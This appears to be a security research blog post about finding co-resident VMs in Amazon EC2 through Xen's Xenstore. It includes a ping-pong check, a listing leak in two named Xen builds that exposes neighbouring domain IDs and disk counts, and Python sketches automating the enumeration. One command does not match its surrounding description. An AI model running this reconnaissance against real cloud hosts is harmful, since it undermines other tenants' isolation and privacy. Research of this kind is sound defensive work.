Digging deeper in EC2

If two VMs are co-resident on the same Xen host, the Xenstore can play a pivotal role in inter-VM communication. To confirm that your VMs are indeed co-resident, a simple “ping-pong” through the Xenstore is a fast verification method. It can even be done with the Xenstore command-line tools, without using the API.

To find out your domain ID, run xenstore-read domid, which reads the domid field in your part of the Xenstore. Your part of the Xenstore normally lives under /local/domain/<ID>/ in the Xenstore tree, and you cannot read the subtrees of co-resident VMs.
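Why other VMs' subtrees are unreadable by default can be illustrated with a simplified model of Xenstore access control. Each node carries a list of entries made of a mode letter (n = none, r = read, w = write, b = both) followed by a domain ID. The first entry names the owner and gives the default mode for every domain not listed later, the owner always has full access, and dom0 bypasses the check. The Python sketch below encodes that model; the function names are hypothetical, and the real daemon has further privilege rules that are not modeled here.

```python
from typing import List, Tuple

# Mode letters used in Xenstore permission entries (simplified model).
MODES = {"n": set(), "r": {"read"}, "w": {"write"}, "b": {"read", "write"}}


def parse_perm(entry: str) -> Tuple[str, int]:
    """Split an entry such as 'r7' into (mode letter, domain ID)."""
    mode, domid = entry[0], entry[1:]
    if mode not in MODES or not domid.isdigit():
        raise ValueError(f"bad permission entry: {entry!r}")
    return mode, int(domid)


def may_access(perms: List[str], domid: int, want: str) -> bool:
    """Simplified check of whether `domid` may perform `want` ('read' or 'write')."""
    if domid == 0:  # dom0 is privileged and bypasses the permission list
        return True
    parsed = [parse_perm(p) for p in perms]
    owner_mode, owner = parsed[0]
    if domid == owner:  # the owner (first entry) always has full access
        return True
    for mode, listed in parsed[1:]:
        if listed == domid:  # an explicit entry overrides the default
            return want in MODES[mode]
    # The first entry's mode is the default for every unlisted domain.
    return want in MODES[owner_mode]
```

For example, a node with permissions ["n5"] is invisible to domain 7, while the same node with ["b5"] lets domain 7 read and write it.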

However, this changes if one of the co-resident VMs cooperates. For instance, the ping-pong becomes possible if you make your VM's subtree accessible to other VMs. It turns out that there is only one field in this subtree that is not owned by domain 0 and whose permissions you can change yourself: the data field. Hence, run the following in the first VM, where <ID> is the domain ID of that VM:

xenstore-chmod /tool/test-hugo b

This grants read and write access (b stands for both) to all other VMs not explicitly listed. The next step is simply to write a string there with xenstore-write and read it with xenstore-read in the second VM. Moreover, I have used the world-readable data field extensively to create a pass-through encryption virtual block device.
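A minimal sketch of the ping-pong, assuming Python 3 and the xenstore-read and xenstore-write command-line tools in both guests. The first VM calls ping() and the second calls pong() on the same key, one whose permissions have been opened up as described above. The key path, the token and the "-pong" reply suffix are hypothetical conventions, not part of Xen; the read/write callables are injectable so the logic can be exercised without a Xen host.

```python
import subprocess
import time
from typing import Callable, Optional

Reader = Callable[[str], Optional[str]]
Writer = Callable[[str, str], None]


def xs_read(path: str) -> Optional[str]:
    """Read a key with the xenstore-read CLI; returns None if the read fails."""
    res = subprocess.run(["xenstore-read", path], capture_output=True, text=True)
    return res.stdout.strip() if res.returncode == 0 else None


def xs_write(path: str, value: str) -> None:
    """Write a key with the xenstore-write CLI; raises if the write is refused."""
    subprocess.run(["xenstore-write", path, value], check=True)


def ping(path: str, token: str, read: Reader = xs_read, write: Writer = xs_write,
         timeout: float = 10.0, poll: float = 0.5) -> bool:
    """First VM: publish `token`, then wait for the peer to reply with token + '-pong'."""
    write(path, token)
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if read(path) == token + "-pong":
            return True
        time.sleep(poll)
    return False


def pong(path: str, token: str, read: Reader = xs_read, write: Writer = xs_write) -> bool:
    """Second VM: if the expected token is present, overwrite it with the reply."""
    if read(path) == token:
        write(path, token + "-pong")
        return True
    return False
```

If ping() returns True, the second VM has both read and written the key, which it can only do through the shared Xenstore of the same host.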

Co-residence information leak

It is in the cloud provider’s interest that cloud computing resources appear homogeneous to cloud consumers. Looking only at the Xenstore, this is true to a certain degree: it is not possible to list the /local/domain directory to see which other VMs are running.

However, one part of the Xenstore has not been properly locked down in all Xen deployments in EC2. On the affected versions, you can list a part of the Xenstore that reveals the Xen domain IDs of the co-resident VMs. With the standard tools, this can be done with:

xenstore-list /local/domain/0/backend/vbd




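The enumeration can be scripted along these lines: list /local/domain/0/backend/vbd to get the domain IDs, drop your own, and list each remaining domain's subdirectory to count the virtual disks that dom0 serves to it. This is a sketch assuming Python 3 and the xenstore-list tool; treating every child of a domain's subdirectory as one disk is an assumption, and on deployments where the directory is locked down, xenstore-list fails and check=True raises CalledProcessError.

```python
import subprocess
from typing import Callable, Dict, List

BACKEND_VBD = "/local/domain/0/backend/vbd"


def xs_list(path: str) -> List[str]:
    """List a Xenstore directory with the xenstore-list CLI (one child per line)."""
    res = subprocess.run(["xenstore-list", path], capture_output=True, text=True, check=True)
    return [line.strip() for line in res.stdout.splitlines() if line.strip()]


def coresident_disks(own_domid: int,
                     list_dir: Callable[[str], List[str]] = xs_list) -> Dict[int, int]:
    """Map each co-resident domain ID to the number of vbd backend entries dom0 holds for it."""
    result: Dict[int, int] = {}
    for entry in list_dir(BACKEND_VBD):
        if not entry.isdigit():
            continue
        domid = int(entry)
        if domid == own_domid:  # skip our own disks
            continue
        # Assumption: each child of .../vbd/<domid> is one virtual disk.
        result[domid] = len(list_dir(f"{BACKEND_VBD}/{domid}"))
    return result
```

Usage in a guest whose own domain ID is known: coresident_disks(own_domid) returns a mapping such as {domid: number_of_disks} for every neighbor.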

Additionally, you can enumerate each VM’s subdirectory to see how many Xen virtual disks it has attached (as well as the major-minor number of each disk device). The affected versions are:

- 3.4.3-kaos_t1micro, with build timestamp: Mon May 28 23:52:08 UTC 2012

- 3.4.3-kaos_t1micro, with build timestamp: Sat Apr 28 07:06:40 UTC 2012
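To check whether a guest runs on one of the listed builds, a Linux guest whose kernel exposes /sys/hypervisor can read the hypervisor version and compile date from sysfs. This sketch assumes that interface is present, that the version string is major.minor followed by the extra field (e.g. ".3-kaos_t1micro"), and that compile_date is formatted exactly like the timestamps listed. It identifies the build only; it does not test for the Xenstore leak itself.

```python
from pathlib import Path
from typing import Tuple

# The affected builds listed above: (version string, build timestamp).
AFFECTED = {
    ("3.4.3-kaos_t1micro", "Mon May 28 23:52:08 UTC 2012"),
    ("3.4.3-kaos_t1micro", "Sat Apr 28 07:06:40 UTC 2012"),
}


def read_hypervisor_build(root: str = "/sys/hypervisor") -> Tuple[str, str]:
    """Return (version, compile date) as exposed by the guest kernel's sysfs."""
    base = Path(root)

    def rd(rel: str) -> str:
        return (base / rel).read_text().strip()

    # Assumed layout: version/{major,minor,extra} and compilation/compile_date.
    version = f"{rd('version/major')}.{rd('version/minor')}{rd('version/extra')}"
    return version, rd("compilation/compile_date")


def is_affected(version: str, compile_date: str) -> bool:
    """True if (version, compile date) matches one of the listed builds."""
    return (version, compile_date) in AFFECTED
```

Usage on a guest: is_affected(*read_hypervisor_build()).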

Since this relates to the Xenstore daemon running in domain 0, the Xen hypervisor version listed here should in principle be irrelevant. However, field experiments showed a 100% correlation between this bug and exactly these two versions, which suggests that it relates to how Amazon packaged Xen together with its customizations. Some results obtained using this bug are as follows.

This plot shows who my neighbors were and how many disks they were using.



Furthermore, this plot shows that there are typically 24 micro instances per physical machine in EC2.

These plots are based on a sample of 26 instances on which the leak was applicable. The number of co-resident VMs is a snapshot taken at the moment of deployment.
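The per-host figures can be derived from the neighbor lists collected on each sampled instance. A minimal sketch, assuming each snapshot is the list of co-resident domain IDs seen by one instance (excluding itself and dom0), so that the number of VMs on that host is the neighbor count plus one. It reports the sample size, the median and a histogram; two sampled instances that landed on the same host would be counted twice, which this sketch does not correct for.

```python
from collections import Counter
from statistics import median
from typing import Dict, List


def summarize(neighbor_lists: List[List[int]]) -> Dict[str, object]:
    """Summarize VMs per host from per-instance neighbor snapshots."""
    # +1 counts the observing instance itself; set() drops duplicate IDs.
    sizes = [len(set(neighbors)) + 1 for neighbors in neighbor_lists]
    return {
        "samples": len(sizes),
        "median_vms_per_host": median(sizes),
        "histogram": Counter(sizes),
    }
```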

Hi Hugo,

Interesting work. If you’re not already familiar with it, you might want to take a look at Adrian Cockcroft’s write-up on EC2: http://perfcap.blogspot.com/2011/03/understanding-and-using-amazon-ebs.html, as well as Ristenpart et al. (2009) on EC2 enumeration. You might also be interested in Joanna Rutkowska’s work on Qubes OS.

Love to chat more if you’re up for it.